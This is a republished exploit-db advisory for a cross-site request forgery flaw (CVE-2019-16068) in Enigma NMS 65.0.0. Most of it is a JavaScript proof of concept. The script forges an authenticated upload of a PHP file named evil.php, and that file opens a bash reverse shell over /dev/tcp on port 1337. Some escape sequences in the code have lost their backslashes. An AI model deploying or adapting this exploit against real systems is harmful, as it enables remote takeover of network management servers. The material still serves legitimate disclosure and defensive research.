Exploit/Advisories
Published on September 9th, 2019 📆 | 6682 Views ⚑
0Enigma NMS 65.0.0 – Cross-Site Request Forgery
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16068 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#
_ _
___ (~ )( ~)
/ _ / /
| D_ ] / -= Enigma CSRF by @xerubus =-
| D _]/ -= We all have something to hide =-
___/ / /
(_ )( _)
@Xerubus
The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
history.pushState('', '', '/')
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:///cgi-bin/protected/manage_files.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------208051173310446317141640314495");
xhr.withCredentials = true;
var body = "-----------------------------208051173310446317141640314495rn" +
"Content-Disposition: form-data; name="action"rn" +
"rn" +
"system_upgradern" +
"-----------------------------208051173310446317141640314495rn" +
"Content-Disposition: form-data; name="action_aux"rn" +
"rn" +
"upload_file_completern" +
"-----------------------------208051173310446317141640314495rn" +
"Content-Disposition: form-data; name="upfile"; filename="evil.php"rn" +
"Content-Type: application/x-phprn" +
"rn" +
"x3c?phpn" +
"n" +
"exec("/bin/bash -c 'bash -i x3e& /dev/tcp//1337 0x3e&1'");n" +
"n" +
"?x3en" +
"rn" +
"-----------------------------208051173310446317141640314495rn" +
"Content-Disposition: form-data; name="upfile_name"rn" +
"rn" +
"evil.phprn" +
"-----------------------------208051173310446317141640314495--rn";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
window.location='http:///cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
https://www.exploit-db.com/exploits/47363
Gloss